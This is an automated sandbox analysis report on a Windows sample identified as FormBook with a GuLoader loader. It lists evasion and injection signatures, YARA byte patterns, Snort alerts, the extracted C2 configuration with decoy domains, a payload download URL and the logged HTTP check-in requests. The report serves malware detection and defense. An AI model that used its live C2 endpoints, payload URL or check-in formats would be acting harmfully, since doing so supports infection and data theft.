Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MaMsKRmgXZ.exe

Overview

General Information

Sample Name:MaMsKRmgXZ.exe
Analysis ID:1324095
MD5:ced4af5a976fb361bfded06260f5985f
SHA1:a4d8b6552d82bf400bd2c5177263d37d044b079a
SHA256:ca26fd8d4675cfec9eee79a402ce93024e4b817655df0307ba3d9dba93f918b2
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • MaMsKRmgXZ.exe (PID: 4828 cmdline: C:\Users\user\Desktop\MaMsKRmgXZ.exe MD5: CED4AF5A976FB361BFDED06260F5985F)
    • MaMsKRmgXZ.exe (PID: 6720 cmdline: C:\Users\user\Desktop\MaMsKRmgXZ.exe MD5: CED4AF5A976FB361BFDED06260F5985F)
      • explorer.exe (PID: 5384 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • cscript.exe (PID: 5612 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)
          • cmd.exe (PID: 1648 cmdline: /c del "C:\Users\user\Desktop\MaMsKRmgXZ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"C2 list": ["www.pwpholdings.com/ro12/"], "decoy": ["start399.com", "decyfincoin.com", "binguozhijiaok.com", "one45.vip", "55dy5s.top", "regmt.pro", "2ahxgaafifl.com", "xn--6rtp2flvfc2h.com", "justinmburns.com", "los3.online", "fleshaaikensdivinegiven7llc.com", "servicedelv.services", "apexcaryhomesforsale.com", "shuraop.xyz", "sagetotal.com", "gratitude-et-compagnie.com", "riderarea.com", "digitalserviceact.online", "contentbyc.com", "agenda-digital-planner.com", "senior-living-91799.bond", "navigationexperiments.com", "tiktok-shop-he.com", "qualityquickprints.com", "ddbetting.com", "navigatenuggets.com", "indiannaturals.online", "xzgx360.com", "xlrj.asia", "seagaming.net", "saltcasing.info", "pq-es.com", "doubleapus.com", "speedgallery.shop", "millions-fans.com", "ktrandnews.com", "niaeoer.com", "60plusmen.com", "nala.dev", "costanotaryservice.com", "palokallio.net", "sportsynergyemporium.fun", "fathomtackle.com", "computer-chronicles.com", "valeriaestate.com", "holzleisten24.shop", "ps212naming.com", "blessed-autos.com", "rptiki.com", "bjykswkj.com", "vorbergh.info", "ssongg273.cfd", "thevitaminstore.store", "easyeats307.com", "mcied.link", "ssongg1620.cfd", "y-12federalcreditunion.top", "jlh777.com", "no5th3267.top", "toolifyonline.com", "hcsjwdy.com", "ypwvj8.top", "hja357b.com", "bajie6.com"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 22 entries
      No Sigma rule has matched
      Timestamp:192.168.11.20185.104.28.23850022802031412 10/11/23-23:00:16.443832
      SID:2031412
      Source Port:50022
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20104.247.82.9450027802031412 10/11/23-23:02:19.557969
      SID:2031412
      Source Port:50027
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20154.12.93.850020802031412 10/11/23-22:59:35.376043
      SID:2031412
      Source Port:50020
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2052.20.84.6250028802031412 10/11/23-23:02:39.898715
      SID:2031412
      Source Port:50028
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20154.197.227.14250021802031412 10/11/23-22:59:57.794442
      SID:2031412
      Source Port:50021
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2091.195.240.12350015802031412 10/11/23-22:56:51.023724
      SID:2031412
      Source Port:50015
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2034.120.249.18150018802031412 10/11/23-22:58:13.359547
      SID:2031412
      Source Port:50018
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20130.185.109.7750019802031412 10/11/23-22:59:14.631131
      SID:2031412
      Source Port:50019
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2018.119.154.6650025802031412 10/11/23-23:01:17.694616
      SID:2031412
      Source Port:50025
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2034.120.249.18150026802031412 10/11/23-23:02:00.232802
      SID:2031412
      Source Port:50026
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2038.242.133.6150030802031412 10/11/23-23:03:44.695205
      SID:2031412
      Source Port:50030
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.72.68.12850012802855192 10/11/23-22:55:50.644822
      SID:2855192
      Source Port:50012
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20104.18.233.4250016802031412 10/11/23-22:57:11.130716
      SID:2031412
      Source Port:50016
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2015.197.142.17350023802031412 10/11/23-23:00:36.461050
      SID:2031412
      Source Port:50023
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20208.91.197.3950024802031412 10/11/23-23:00:57.133284
      SID:2031412
      Source Port:50024
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.203.64.163.5050017802031412 10/11/23-22:57:51.976587
      SID:2031412
      Source Port:50017
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.201.1.1.153908532023883 10/11/23-22:58:12.039557
      SID:2023883
      Source Port:53908
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.pwpholdings.com/ro12/"], "decoy": ["start399.com", "decyfincoin.com", "binguozhijiaok.com", "one45.vip", "55dy5s.top", "regmt.pro", "2ahxgaafifl.com", "xn--6rtp2flvfc2h.com", "justinmburns.com", "los3.online", "fleshaaikensdivinegiven7llc.com", "servicedelv.services", "apexcaryhomesforsale.com", "shuraop.xyz", "sagetotal.com", "gratitude-et-compagnie.com", "riderarea.com", "digitalserviceact.online", "contentbyc.com", "agenda-digital-planner.com", "senior-living-91799.bond", "navigationexperiments.com", "tiktok-shop-he.com", "qualityquickprints.com", "ddbetting.com", "navigatenuggets.com", "indiannaturals.online", "xzgx360.com", "xlrj.asia", "seagaming.net", "saltcasing.info", "pq-es.com", "doubleapus.com", "speedgallery.shop", "millions-fans.com", "ktrandnews.com", "niaeoer.com", "60plusmen.com", "nala.dev", "costanotaryservice.com", "palokallio.net", "sportsynergyemporium.fun", "fathomtackle.com", "computer-chronicles.com", "valeriaestate.com", "holzleisten24.shop", "ps212naming.com", "blessed-autos.com", "rptiki.com", "bjykswkj.com", "vorbergh.info", "ssongg273.cfd", "thevitaminstore.store", "easyeats307.com", "mcied.link", "ssongg1620.cfd", "y-12federalcreditunion.top", "jlh777.com", "no5th3267.top", "toolifyonline.com", "hcsjwdy.com", "ypwvj8.top", "hja357b.com", "bajie6.com"]}
      Source: Yara matchFile source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: MaMsKRmgXZ.exeAvira: detected
      Source: http://www.nala.dev/ro12/Avira URL Cloud: Label: malware
      Source: http://www.los3.online/ro12/www.start399.comAvira URL Cloud: Label: malware
      Source: http://www.xlrj.asia/ro12/www.fathomtackle.comAvira URL Cloud: Label: malware
      Source: http://www.doubleapus.com/ro12/Avira URL Cloud: Label: malware
      Source: http://www.los3.online/ro12/Avira URL Cloud: Label: malware
      Source: http://www.riderarea.com/ro12/?3fY=-ZkX&pR-=LGYu0+ofLQhP7724nJ/BQ1gFrbGvfVPqmQuS2LiwheVAxFjzT3VG9Q3bfEwRvtUKPFG/Avira URL Cloud: Label: malware
      Source: http://www.nala.dev/ro12/www.rptiki.comAvira URL Cloud: Label: malware
      Source: http://www.fathomtackle.com/ro12/www.digitalserviceact.onlineAvira URL Cloud: Label: malware
      Source: http://www.ktrandnews.com/ro12/Avira URL Cloud: Label: malware
      Source: http://www.niaeoer.com/ro12/www.shuraop.xyzAvira URL Cloud: Label: malware
      Source: http://www.ktrandnews.com/ro12/www.nala.devAvira URL Cloud: Label: malware
      Source: http://www.ps212naming.com/ro12/?pR-=rtUgTuNL7uL+LGGSpkT0QUDqa6bNuU9c/oVzs0vN/XeiV6RFY6H23yk7imnqF7CC5MmR&Wx=ChSLGhh0Mn9TylKPAvira URL Cloud: Label: malware
      Source: http://www.senior-living-91799.bond/ro12/www.riderarea.comAvira URL Cloud: Label: malware
      Source: http://www.justinmburns.com/ro12/Avira URL Cloud: Label: malware
      Source: http://www.qualityquickprints.com/ro12/?pR-=uQgh28/mwUTAreWLWMvWctCpaYYKSPk/RTU2hG/2GkXh2eCF81faGnz4QbuRWtjyYx7X&Wx=ChSLGhh0Mn9TylKPAvira URL Cloud: Label: malware
      Source: http://www.55dy5s.top/ro12/?pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo&Wx=ChSLGhh0Mn9TylKPAvira URL Cloud: Label: phishing
      Source: http://www.55dy5s.top/ro12/Avira URL Cloud: Label: phishing
      Source: http://www.ddbetting.com/ro12/?pR-=hMzxxbkXjK5UhHFUVKKzsXjiG5SdjoCmZm0mRTZiy05C1nCrhTC2iqR8bXRfdiWJf26x&Wx=ChSLGhh0Mn9TylKPAvira URL Cloud: Label: malware
      Source: http://www.55dy5s.top/ro12/?3fY=-ZkX&pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXoAvira URL Cloud: Label: phishing
      Source: http://www.rptiki.com/ro12/www.tiktok-shop-he.comAvira URL Cloud: Label: malware
      Source: http://www.ps212naming.comAvira URL Cloud: Label: malware
      Source: http://www.shuraop.xyz/ro12/Avira URL Cloud: Label: phishing
      Source: http://www.rptiki.comAvira URL Cloud: Label: phishing
      Source: http://www.holzleisten24.shop/ro12/www.xlrj.asiaAvira URL Cloud: Label: malware
      Source: http://www.easyeats307.com/ro12/www.doubleapus.comAvira URL Cloud: Label: malware
      Source: http://www.digitalserviceact.online/ro12/?pR-=4oHDpgyPUiJGP23m0SdAgh/yfEH8JJ8nkAUqpp/b29PXB/3TZ/gO5/kpv5F7QImaAVTW&Wx=ChSLGhh0Mn9TylKPAvira URL Cloud: Label: malware
      Source: http://www.start399.com/ro12/?pR-=GwGtW18azFWuCI/cWsMSGkvtLVgXrxrAejaoI1gQoBI/O/ZzRnUmOmWdpT96riJEH3vd&Wx=ChSLGhh0Mn9TylKPAvira URL Cloud: Label: malware
      Source: http://www.xlrj.asiaAvira URL Cloud: Label: phishing
      Source: http://www.holzleisten24.shop/ro12/Avira URL Cloud: Label: malware
      Source: http://www.shuraop.xyz/ro12/www.qualityquickprints.comAvira URL Cloud: Label: phishing
      Source: http://www.fathomtackle.com/ro12/?pR-=gzgOk9L9AfWHfN0tCkhRIi8dk8p3PFyiDnwZelvp2AG1WsshoUlVSypZKzCbkCaQBejH&Wx=ChSLGhh0Mn9TylKPAvira URL Cloud: Label: malware
      Source: http://www.niaeoer.com/ro12/?pR-=dJqi3gPkjgABca74pxnHJ2flNeCuOiIkF0IIcqv13LRvEaAIYFadFLyq9bv/k+1Q0EDq&Wx=ChSLGhh0Mn9TylKPAvira URL Cloud: Label: malware
      Source: http://103.72.68.128/pcd/wAYOlXAIjrMljL79.binAvira URL Cloud: Label: malware
      Source: http://www.senior-living-91799.bond/ro12/Avira URL Cloud: Label: malware
      Source: http://www.tiktok-shop-he.com/ro12/Avira URL Cloud: Label: malware
      Source: http://www.digitalserviceact.online/ro12/www.ddbetting.comAvira URL Cloud: Label: malware
      Source: http://www.ddbetting.com/ro12/Avira URL Cloud: Label: malware
      Source: http://www.riderarea.com/ro12/www.shuraop.xyzAvira URL Cloud: Label: malware
      Source: http://www.shuraop.xyz/ro12/www.ktrandnews.comAvira URL Cloud: Label: phishing
      Source: http://www.digitalserviceact.online/ro12/Avira URL Cloud: Label: malware
      Source: http://www.doubleapus.com/ro12/www.holzleisten24.shopAvira URL Cloud: Label: malware
      Source: http://www.tiktok-shop-he.comAvira URL Cloud: Label: malware
      Source: http://www.xlrj.asia/ro12/?pR-=0LOFVeHqsrMeo4L+dmJBR/0B/c0sqVoEg1WVw/8t1mjD3B4IGyZiGj+5uErL3J0wPr7A&Wx=ChSLGhh0Mn9TylKPAvira URL Cloud: Label: malware
      Source: http://www.holzleisten24.shop/ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKPAvira URL Cloud: Label: malware
      Source: MaMsKRmgXZ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: MaMsKRmgXZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: cscript.pdbUGP source: MaMsKRmgXZ.exe, 00000002.00000003.9948228085.0000000004182000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9947395565.000000000415F000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970397613.0000000034030000.00000040.10000000.00040000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9889030155.000000003400B000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9885871451.0000000033E5E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: MaMsKRmgXZ.exe, MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9889030155.000000003400B000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9885871451.0000000033E5E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe
      Source: Binary string: mshtml.pdbUGP source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: cscript.pdb source: MaMsKRmgXZ.exe, 00000002.00000003.9948228085.0000000004182000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9947395565.000000000415F000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970397613.0000000034030000.00000040.10000000.00040000.00000000.sdmp
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_004062DD FindFirstFileA,FindClose,0_2_004062DD
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004057A2
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_00402765 FindFirstFileA,0_2_00402765
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi5_2_021A6CBB
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi5_2_021A7D83

      Networking

      barindex
      Source: C:\Windows\explorer.exeNetwork Connect: 52.20.84.62 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 130.185.109.77 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 172.177.169.252 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 15.197.142.173 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.39 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 18.119.154.66 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.120.249.181 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.123 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.12.93.8 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.digitalserviceact.online
      Source: C:\Windows\explorer.exeNetwork Connect: 185.104.28.238 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 158.247.235.89 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.18.233.42 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.247.82.94 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.197.227.142 80Jump to behavior
      Source: TrafficSnort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.20:50012 -> 103.72.68.128:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50015 -> 91.195.240.123:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50016 -> 104.18.233.42:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50017 -> 3.64.163.50:80
      Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.20:53908 -> 1.1.1.1:53
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50018 -> 34.120.249.181:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50019 -> 130.185.109.77:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50020 -> 154.12.93.8:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50021 -> 154.197.227.142:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50022 -> 185.104.28.238:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50023 -> 15.197.142.173:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50024 -> 208.91.197.39:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50025 -> 18.119.154.66:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50026 -> 34.120.249.181:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50027 -> 104.247.82.94:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50028 -> 52.20.84.62:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50030 -> 38.242.133.61:80
      Source: Malware configuration extractorURLs: www.pwpholdings.com/ro12/
      Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
      Source: Joe Sandbox ViewASN Name: XIRRADE XIRRADE
      Source: Joe Sandbox ViewASN Name: FARIYA-PKFariyaNetworksPvtLtdPK FARIYA-PKFariyaNetworksPvtLtdPK
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=GwGtW18azFWuCI/cWsMSGkvtLVgXrxrAejaoI1gQoBI/O/ZzRnUmOmWdpT96riJEH3vd&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.start399.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=dJqi3gPkjgABca74pxnHJ2flNeCuOiIkF0IIcqv13LRvEaAIYFadFLyq9bv/k+1Q0EDq&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.niaeoer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=uQgh28/mwUTAreWLWMvWctCpaYYKSPk/RTU2hG/2GkXh2eCF81faGnz4QbuRWtjyYx7X&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.qualityquickprints.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.55dy5s.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.holzleisten24.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=0LOFVeHqsrMeo4L+dmJBR/0B/c0sqVoEg1WVw/8t1mjD3B4IGyZiGj+5uErL3J0wPr7A&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.xlrj.asiaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=gzgOk9L9AfWHfN0tCkhRIi8dk8p3PFyiDnwZelvp2AG1WsshoUlVSypZKzCbkCaQBejH&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.fathomtackle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=4oHDpgyPUiJGP23m0SdAgh/yfEH8JJ8nkAUqpp/b29PXB/3TZ/gO5/kpv5F7QImaAVTW&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.digitalserviceact.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=hMzxxbkXjK5UhHFUVKKzsXjiG5SdjoCmZm0mRTZiy05C1nCrhTC2iqR8bXRfdiWJf26x&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.ddbetting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=rtUgTuNL7uL+LGGSpkT0QUDqa6bNuU9c/oVzs0vN/XeiV6RFY6H23yk7imnqF7CC5MmR&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.ps212naming.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=uAil5XdBoZ+2CkbxeHQt0E2a6PqX6RKuOQ+ejqYxtKGY7TwYTqnnbJE3/J+NrU/b1JZc&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.pwpholdings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?3fY=-ZkX&pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo HTTP/1.1Host: www.55dy5s.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=TUQv1xq+sor4G/cf0NME9zAsbR56SjOR/AikpQZ6liEkkl3DXF9T0sERNIDZexcZDDH8&3fY=-ZkX HTTP/1.1Host: www.senior-living-91799.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?3fY=-ZkX&pR-=LGYu0+ofLQhP7724nJ/BQ1gFrbGvfVPqmQuS2LiwheVAxFjzT3VG9Q3bfEwRvtUKPFG/ HTTP/1.1Host: www.riderarea.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
